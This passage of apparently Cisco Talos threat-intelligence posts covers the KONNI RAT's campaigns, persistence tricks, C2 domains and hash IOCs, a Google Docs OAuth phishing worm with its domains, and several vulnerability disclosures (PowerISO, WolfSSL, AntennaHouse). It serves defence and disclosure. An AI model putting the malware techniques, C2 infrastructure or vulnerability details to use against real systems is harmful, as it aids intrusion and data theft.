Firefox profiles and cookies stealer
Chrome profiles and cookies stealer
Opera profiles and cookies stealer

The malware internally uses several temporary files:

spadmgr.ocx
screentmp.tmp (log file of the keylogger)
solhelp.ocx
sultry.ocx

2016 Campaign: "How can North Korean hydrogen bomb wipe out Manhattan.src"

The name of the .src file was directly linked to tension between North Korea and USA in March 2016: more information. Based on the compilation dates of the binaries, the campaign took place in the same period. An interesting fact: the dropped library was compiled in 2014 and appears in our telemetry in August 2015. Indicating that this library was probably used in another campaign.

The .src file contains 2 Office documents. The first document was in English and a second in Russian. In the sample only the English version can be displayed to the user (that is hardcoded in the sample):

The Russian document is not used by the sample, we assume that the author of the malware forgot to remove the resource containing the Russia decoy document:

The malware author changed the malware architecture, this version is divided in two binaries:

conhote.dll
winnit.exe

Another difference is the directory where the files are dropped, it's no longer C:\Windows but rather the local setting of the current user (%USERPROFILE%\Local Settings\winnit\winnit.exe). Thanks to this modification, the malware can be executed with a non-administrator account. The .dll file is executed by the .exe file. In this version, a shortcut is created in order to launch winnit.exe in the following path %USERPROFILE%\Start Menu\Programs\Startup\Anti virus service.lnk. As you can see the attacker has went to great lengths to disguise his service as a legitimate Antivirus Service by using the name 'Anti virus service.lnk'. This is of course simple but often it can be enough for a user to miss something malicious by name.

As in the previous version, the ID of the infected system is generated with exactly the same method. The C2 is different and the analysed version this time only contains a single domain:

dowhelsitjs[.]netau[.]net

In this version, the developer used a different API, the Wininet API which make more sense for Web requests. Moreover the C2 infrastructure evolved too, more .php files are available through the web hosting:

<c2-domain>/login.php (for infected machine registration)
<c2-domain>/upload.php (for uploading files on the C2)
<c2-domain>/download.php (for downloading file from the C2)

This version includes the stealer features mentioned in the previous version and additionally Remote Administration Tool features such as file uploading/download and arbitrary command execution. The library is only used to perform keylogging and clipboard stealing. Indeed, the malware author moved this part of the code from the core of the malware to a library. An interesting element is that the malware looks for filenames created with the previous version of KONNI. This implies that the malware targeted the same people as the previous version and they are designed to work together.

The malware internally uses the following files:

solhelp.ocx
sultry.ocx
helpsol.ocx
psltre.ocx
screentmp.tmp (log file of the keylogger)
spadmgr.ocx
apsmgrd.ocx
wpg.db

2017 Campaigns

Pyongyang Directory Group email April 2017 RC_Office_Coordination_Associate.src

In this campaign, the malware author uses the following name: Pyongyang Directory Group email April 2017 RC_Office_Coordination_Associate.src. The decoy document shown after infection is an Office document containing email addresses, phone numbers and contacts of members of official organizations such as the United Nations, UNICEF, Embassies linked to North Korea.

The .src files drops two files: an executable and a library. As in the previous version, the persistence is achieved by a Windows shortcut (in this case adobe distillist.lnk). Contrary to the previous version, the developers moved the core of malware to the library. The executable performs the following tasks:

If the system is a 64-bit version of Windows, it downloads and executes a specific 64-bit version of the malware thanks to a powershell script:

Loading the dropped library

The library contains the same features as the previous version as well as new ones. This version of KONNI is the most advanced with better coding. The malware configuration contains one Command and Control:

pactchfilepacks[.]net23[.]net

A new URI is available:

<c2-domain>/uploadtm.php

This URI is used with a new feature implemented in this version: the malware is able to perform screenshot (thanks to the GDI API) and uploads it thank to this URL. The malware checks if a file used on a previous version of KONNI is available on the system. Here is the complete list of files internally used by the RAT:

error.tmp (the log file of the keylogger)
tedsul.ocx
helpsol.ocx
trepsl.ocx
psltred.ocx
solhelp.ocx
sulted.ocx

The handling of instructions has improved too. Here are the 7 actions that the infected machine can be instructed to perform:

Delete a specific file;
Upload a specific file based on a filename;
Upload a specific file based on the full path name;
Create a screenshot and uploads it on the C2;
Get system information;
Download a file from the Internet;
Execute a command;

This graph shows the decision tree:

When the attacker wants to gather information on the infected system (action 5), it retrieves the following information:

Hostname
IP address
Computer name
Username name
Connected drive
OS version
Architecture
Start menu programs
Installed software

Inter Agency List and Phonebook - April 2017 RC_Office_Coordination_Associate.src

The last identified campaign where KONNI was used was named Inter Agency List and Phonebook - April 2017 RC_Office_Coordination_Associate.src. This file drops exactly the same files than the previous campaign but the decoy document is different:

This document contains the name, phone number and email address of members of agencies, embassies and organizations linked to North Korea.

Conclusion

The analysis shows us the evolution of KONNI over the last 3 years. The last campaign was started a few days ago and is still active. The infrastructure remains up and running at the time of this post. The RAT has remained under the radar for multiple years. An explanation could be the fact that the campaign was very limited nature, which does not arouse suspicion.

This investigation shows that the author has evolved technically (by implementing new features) and in the quality of the decoy documents. The campaign of April 2017 used pertinent documents containing potentially sensitive data. Moreover the metadata of the Office document contains the names of people who seems to work for a public organization. We don't know if the document is a legitimate compromised document or a fake that the attacker has created in an effort to be credible.

Clearly the author has a real interest in North Korea, with 3 of the 4 campaigns are linked to North Korea.

The following graph show the evolution of KONNI over the last 3 years:

Coverage

Additional ways our customers can detect and block this threat are listed below.

IOCs

2014 Campaign: Fatal Beauty

Dropper

SHA256: 413772d81e4532fec5119e9dce5e2bf90b7538be33066cf9a6ff796254a5225f
Filename: beauty.scr

Dropped files

#1
SHA256: eb90e40fc4d91dec68e8509056c52e9c8ed4e392c4ac979518f8d87c31e2b435
Filename: C:\Windows\beauty.jpg
File type: JPEG image data, JFIF standard 1.02

#2
SHA256: 44150350727e2a42f66d50015e98de462d362af8a9ae33d1f5124f1703179ab9
Hilename: C:\Windows\svchost.exe
File type: PE32 executable (GUI) Intel 80386, for MS Windows

CC

phpschboy[.]prohosts[.]org
jams481[.]site[.]bz

2016 Campaign: How can North Korean hydrogen bomb wipe out Manhattan

Dropper

SHA256: 94113c9968db13e3412c1b9c1c882592481c559c0613dbccfed2fcfc80e77dc5
Filename: How can North Korean hydrogen bomb wipe out Manhattan.src

Dropped

#1
SHA256: 56f159cde3a55ae6e9270d95791ef2f6859aa119ad516c9471010302e1fb5634
Filename: conhote.dll

#2
SHA256: 553a475f72819b295927e469c7bf9aef774783f3ae8c34c794f35702023317cc
Filename: winnit.exe

#3
SHA256: 92600679bb183c1897e7e1e6446082111491a42aa65a3a48bd0fceae0db7244f
Filename: Anti virus service.lnk

CC

dowhelsitjs[.]netau[.]net

2017 Campaign A:

Dropper

SHA256: 69a9d7aa0cb964c091ca128735b6e60fa7ce028a2ba41d99023dd57c06600fe0
Filename: Pyongyang Directory Group email April 2017 RC_Office_Coordination_Associate.src

Dropped

#1
SHA256: 3de491de3f39c599954bdbf08bba3bab9e4a1d2c64141b03a866c08ef867c9d1
Filename: adobe distillist.lnk

#2
SHA256: 39bc918f0080603ac80fe1ec2edfd3099a88dc04322106735bc08188838b2635
Filename: winload.exe

#3
SHA256: dd730cc8fcbb979eb366915397b8535ce3b6cfdb01be2235797d9783661fc84d
Filename: winload.dll

CC

Pactchfilepacks[.]net23[.]net
checkmail[.]phpnet[.]us

2017 Campaign B:

Dropper

SHA256: 640477943ad77fb2a74752f4650707ea616c3c022359d7b2e264a63495abe45e
Filename: Inter Agency List and Phonebook - April 2017 RC_Office_Coordination_Associate.src

Dropped

#1
SHA256: 4585584fe7e14838858b24c18a792b105d18f87d2711c060f09e62d89fc3085b
Filename: adobe distillist.lnk

#2
SHA256: 39bc918f0080603ac80fe1ec2edfd3099a88dc04322106735bc08188838b2635
Filename: winload.exe

#3
SHA256: dd730cc8fcbb979eb366915397b8535ce3b6cfdb01be2235797d9783661fc84d
Filename: winload.dll

CC

Pactchfilepacks[.]net23[.]net
checkmail[.]phpnet[.]us

Related samples

413772d81e4532fec5119e9dce5e2bf90b7538be33066cf9a6ff796254a5225f
44150350727e2a42f66d50015e98de462d362af8a9ae33d1f5124f1703179ab9
553a475f72819b295927e469c7bf9aef774783f3ae8c34c794f35702023317cc
56f159cde3a55ae6e9270d95791ef2f6859aa119ad516c9471010302e1fb5634
94113c9968db13e3412c1b9c1c882592481c559c0613dbccfed2fcfc80e77dc5
f091d210fd214c6f19f45d880cde77781b03c5dc86aa2d62417939e7dce047ff
0f327d67b601a87e575e726dc67a10c341720267de58f3bd2df3ce705055e757
234f9d50aadb605d920458cc30a16b90c0ae1443bc7ef3bf452566ce111cece8
39bc918f0080603ac80fe1ec2edfd3099a88dc04322106735bc08188838b2635
581e820637decf37bfd315c6eb71176976a0f2d59708f2836ff969873b86c7db
640477943ad77fb2a74752f4650707ea616c3c022359d7b2e264a63495abe45e
69a9d7aa0cb964c091ca128735b6e60fa7ce028a2ba41d99023dd57c06600fe0
97b1039612eb684eaec5d21f0ac0a2b06b933cc3c078deabea2706cb69045355
dae9d8f9f7f745385286775f6e99d3dcc55bbbe47268a3ea20deffe5c8fd0f0e
dd730cc8fcbb979eb366915397b8535ce3b6cfdb01be2235797d9783661fc84d
e6a9d9791f763123f9fe1f69e69069340e02248b9b16a88334b6a5a611944ef9
ead47df090a4de54220a8be27ec6737304c1c3fe9d0946451b2a60b8f11212d1

↧

Gmail Worm Requiring You To Give It A Push And Apparently You All Are Really Helpful

May 3, 2017, 2:28 pm

≫ Next: Vulnerability Spotlight: AntennaHouse DMC Library Arbitrary Code Execution Flaws

≪ Previous: KONNI: A Malware Under The Radar For Years

This post authored by Sean Baird and Nick Biasini

Attackers are always looking for creative ways to send large amount of spam to victims. A short-lived, but widespread Google Drive themed phishing campaign has affected a large number of users across a variety of verticals. This campaign would be bcc'd to a target while being sent to hhhhhhhhhhhhhhhh@mailinator[.]com, to make this email appear legitimate the sender would be someone who had the target in their address book.

Mailinator is a "free, public, email system where you can use any inbox you want," often used for throwaway accounts. In this instance, the Mailinator inbox in question could have been used by the spammer to monitor whether or not the email was successfully sent. The use of Mailinator, however, is not what made this campaign unique.

Campaign Details

The malicious email

As you can see, the email is pretty standard for a phishing attempt. In this case, they were targeting Google specifically and have done so via Google Docs. Typically, what you would see is a link to a "cloned" site that is used to harvest the username and password for the targeted service, in this case Google. However, this campaign took a completely different approach.

The "Open in Docs" link contained in the email directed the recipient to a legitimate Google site which required log-in with Google credentials. Upon entering the site, a service called "Google Docs" requested permission to "Read, send, delete, and manage" email and contacts. This is a legitimate request and is part of a lot of applications that make use of google as an authentication mechanism. The portion that is not normal are the permissions that are being requested.

The OAuth service named "Google Docs" requesting permissions

After clicking allow (and waiting a significant amount of time), We were directed to h[xx]ps://googledocs[.]g-cloud[.]win/. In this attack, we identified several other malicious hosts, including:

docscloud[.]download
docscloud[.]info
docscloud[.]win
gdocs[.]download
docscloud[.]info
g-docs[.]pro
gdocs[.]pro
gdocs[.]win
docscloud[.]download
g-cloud[.]win
g-cloud[.]pro

Currently these requests result in an HTTP 502 response. This would happen due to too many users trying to access the site at once, or because Cloudflare took down the impacted sites.

The 502 Error on the destination page.

Talos was able to identify other instances of users interacting with the page and receiving data. A brief analysis of this data did not return anything inherently malicious including a true malicious payload or POST requests indicating additional credential theft.

This attack was notable due the sheer volume and velocity at which it was executed. What started as a trickle of emails quickly became a deluge resulting in a prime area of focus on Twitter and in the security community. Due to its relentless nature it got everyone's attention.

The volume being reported to us over roughly two hours of the attack (Eastern).

Purpose

The goal of this attack is likely two-fold. This instance acted as potential proof-of-concept for a convincing Google phish via OAuth. Second, and more concerning, this attack allowed the OAuth owner access to all of the email content and contact information for every compromised victim of the attack. This means that the attacker potentially has access to all of the information within your account and the ability to read, send, delete and manage the email and contacts of the associated account. Additionally, since OAuth was used, the typical protections like changing passwords has no immediate impact on the adversaries access.

Mitigation and Protections

Because of the success of this attack, we are likely going to see phishing attacks of this nature for the foreseeable future. Users must be very careful what they click on, particularly when it involves passwords or granting permissions or access of some kind. If in doubt, reach out to the sender of the attachment or link using a means other than email to verify the integrity of their email.

If you have fallen for this attack you should go into your Google account settings and revoke permissions from the rogue fake Google Docs service. You should then change your password immediately.

In addition, as the attacker had access to all of your email content, you should take measures to prevent secondary attacks, such as identity theft and blackmail.

IOC

Domains:

docscloud[.]download
docscloud[.]info
docscloud[.]win
gdocs[.]download
docscloud[.]info
g-docs[.]pro
gdocs[.]pro
gdocs[.]win
docscloud[.]download
g-cloud[.]win
g-cloud[.]pro

Conclusion

Adversaries will remain vigilant in figuring out creative ways to deliver spam or malware to end users. This is just the latest example of a clever way to achieve this goal. Like all other creative, novel approaches it will likely be heavily copied almost immediately. Google is just one example, but there are likely other services that are used to as alternative authentication mechanisms. Two likely candidates are Facebook and LinkedIn. It's highly likely that similar attacks leveraging those types of credentials could follow in addition to a continued Google attack vector.

Cisco Cloudlock has identified more than 275,000 OAuth applications connected to core cloud services such as Microsoft Office 365. This compares to just 5,500 such applications just 3 years ago. It’s likely that similar attacks leveraging these types of credentials will follow and that the Google attack vector will be continue to be utilized.

Another thing to keep in mind is this adversary likely did not anticipate the velocity with which this attack would follow. This was a loud and noisy version and subtle, low volume attacks are likely to follow. This again points to some basic security principles. Namely, don't trust email, no matter how legitimate looking, do not allow 3rd parties have access to any of your accounts. In the instance where the option exists to either login with an existing 3rd party account or create a new account, create the new account. It may take a little additional time, but it can prevent a catastrophic compromise of your email and contacts.

Coverage

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cloudlock, our CASB solution specifically identifies, classifies and mitigates risks related to OAuth connected applications.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

The Network Security protection of IPS and NGFW have up-to-date signatures to detect malicious network activity by threat actors.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network

↧

Vulnerability Spotlight: AntennaHouse DMC Library Arbitrary Code Execution Flaws

May 4, 2017, 10:09 am

≫ Next: Vulnerability Spotlight: Power Software PowerISO ISO Code Execution Vulnerabilities

≪ Previous: Gmail Worm Requiring You To Give It A Push And Apparently You All Are Really Helpful

These vulnerabilities were discovered by Marcin 'Icewall' Noga of Talos.

Today, Talos is disclosing several vulnerabilities that have been identified in the AntennaHouse DMC library which is used in various products for web-based document searching and rendering. These vulnerabilities manifest as a failure to correctly parse Microsoft Office documents and could be exploited to achieve arbitrary code execution. These vulnerabilities are being disclosed in coordination with AntennaHouse.

Vulnerability Details

Multiple heap corruption vulnerabilities exist within AntennaHouse DMC HTMLFilter that could be exploited to achieve arbitrary code execution on the targeted machine. These vulnerabilities manifest due to improper handling of Microsoft Office documents, such as Word and PowerPoint files. An adversary that passes a specifically crafted document to the converter could exploit one of these vulnerabilities. Note that the method that an adversary could compromise a vulnerable machine varies as this library is known to be incorporated into other third-party products.

For the full technical details regarding these vulnerabilities, please refer to the full vulnerability advisories which can be found below:

TALOS-2016-0207 (CVE-2016-8382) - AntennaHouse DMC HTMLFilter Doc_SetSummary Code Execution
TALOS-2016-0208 (CVE-2016-8383) - AntennaHouse DMC HTMLFilter Doc_GetFontTable Code Execution
TALOS-2016-0209 (CVE-2016-8384) - AntennaHouse DMC HTMLFilter DHFSummary Code Execution
TALOS-2017-0279 (CVE-2017-2783) - AntennaHouse DMC HTMLFilter FillRowFormat Code Execution Vulnerability
TALOS-2017-0284 (CVE-2017-2792) - AntennaHouse DMC HTMLFilter iBldDirInfo Code Execution Vulnerability
TALOS-2017-0285 (CVE-2017-2793) - AntennaHouse DMC HTMLFilter UnCompressUnicode Code Execution Vulnerability
TALOS-2017-0286 (CVE-2017-2794) - AntennaHouse DMC HTMLFilter PPT DHFSummary Code Execution Vulnerability
TALOS-2017-0288 (CVE-2017-2795) - AntennaHouse DMC HTMLFilter Txo Code Execution Vulnerability
TALOS-2017-0290 (CVE-2017-2797) - AntennaHouse DMC HTMLFilter PPT ParseEnvironment Code Execution Vulnerability
TALOS-2017-0291 (CVE-2017-2798) - AntennaHouse DMC HTMLFilter GetIndexArray Code Execution Vulnerability
TALOS-2017-0292 (CVE-2017-2799) - AntennaHouse DMC HTMLFilter AddSst Code Execution Vulnerability

Coverage

Talos has released rules that detect attempts to exploit these vulnerabilities to protect our customers. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort Rules: 40789-40790, 40927-40932, 41511-41512, 41543-41546, 41703-41704, 41726-41727, 41753-41754, 41759-41760, 41765-41766

For the full technical details regarding these and other vulnerabilities, please visit our vulnerability reports portal on our website:

http://www.talosintelligence.com/vulnerability-reports/

↧

Vulnerability Spotlight: Power Software PowerISO ISO Code Execution Vulnerabilities

May 5, 2017, 10:53 am

≫ Next: Vulnerability Spotlight: WolfSSL library X.509 Certificate Text Parsing Code Execution Vulnerability

≪ Previous: Vulnerability Spotlight: AntennaHouse DMC Library Arbitrary Code Execution Flaws

These vulnerabilities were discovered by Piotr Bania of Cisco Talos.

Today, Talos is releasing details of a new vulnerability discovered within the Power Software PowerISO disk imaging software. TALOS-2017-0318 and TALOS-2017-0324 may allow an attacker to execute arbitrary code remotely on the vulnerable system when a specially crafted ISO image is opened and parsed by the PowerISO software.

Overview

The vulnerabilities are present in the Power Software PowerISO disk imaging utility, used by Windows users to create, edit, mount and convert various popular disk image file formats. The software is commonly used by home users to mount ISO disk images since this capability is not included by default in Windows versions prior to version 8.

ISO (9660) disk image format is a file system within a single file. Essentially, it is a binary copy of the file system used by the standard software CD-ROM installation disks. Today, most of the installation disks for popular software and operating systems are distributed using the ISO file format.

TALOS-2017-0318 - Power Software PowerISO ISO Code Execution Vulnerability (CVE-2017-2817)

A stack buffer overflow vulnerability exists in the ISO image parsing functionality of Power Software Ltd PowerISO disk imaging software. A specially crafted .ISO file can cause a vulnerability resulting in potential code execution. An attacker can send specific .ISO file to trigger this vulnerability. More details of the vulnerability can be found in the report TALOS-2017-0318.

TALOS-2017-0324 - PowerISO ISO Parsing Use After Free Vulnerability (CVE-2017-2823)

A use-after-free vulnerability exists in the .ISO parsing functionality of PowerISO 6.8. A specially crafted .ISO file can cause a vulnerability resulting in potential code execution. An attacker can send a specific .ISO file to trigger this vulnerability. More details about the discovered vulnerability are available in the report TALOS-2017-0324

Known vulnerable versions

PowerISO 6.8.

Discussion

ISO 9660 file format is one of the older formats and its original specification contains several limitations on the file name length, directory depth as well as the maximum file size. These limitations are inherited from older operating systems. Specifically, filename lengths in ISO 9660 file system are limited to maximum 8 characters with maximum 3 characters reserved for the file extension.

Over time, various extensions have been developed to overcome the limitation of the original file format specification. One of the extensions, so called Rock Ridge extension, allows for alternative names to the original file. The alternative name can be longer than the default 8 characters.

A vulnerability in PowerISO software exists when parsing the alternative name (NM) System Use Entry. The structure of the alternative name contains a single byte length field which can be manipulated by the attacker to cause a stack buffer overflow that may allow remote code execution of code in the context of the PowerISO user.

Although third party disk image utilities can be useful in many cases, it is worth checking if the default operating system functionality satisfies user's needs. Specifically, Windows 8 and later has the built-in capability to mount ISO images, which may remove the need for third party disk imaging utilities.

Users that still have a requirement for a third party disk imaging software should ensure that security updates are applied for the product as soon as they are released to remediate potential attack vectors.

Coverage

↧

Vulnerability Spotlight: WolfSSL library X.509 Certificate Text Parsing Code Execution Vulnerability

May 8, 2017, 9:54 am

≫ Next: Microsoft Patch Tuesday - May 2017

≪ Previous: Vulnerability Spotlight: Power Software PowerISO ISO Code Execution Vulnerabilities

Discovered by Aleksandar Nikolic of Cisco Talos

Overview

Talos is disclosing TALOS-2017-0293 / CVE 2017-2800, a code execution vulnerability in WolfSSL. WolfSSL is a lightweight SSL/TLS library targeted specifically for embedded and RTOS (Real-Time Operating System) environments, due largely to its small size and performance. WolfSSL is used in a wide range of products including ICS and IoT devices.

This particular vulnerability is related to the use of x.509 certificates and the code that deals with string fields in DER certificates. Specifically the code responsible for parsing 'commonName', 'countryName', 'localityName', 'stateName', 'orgName', and 'orgUnit'. A specially crafted x.509 certificate can cause a single out-of-bounds overwrite that could result in certificate validation issues, denial of service, or remote code execution. To trigger this vulnerability, the adversary needs to supply a malicious x.509 certificate to either the server or client application that is making use of this library. The full details surrounding the vulnerability are available here.

Coverage

The following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort Rule: 42000

↧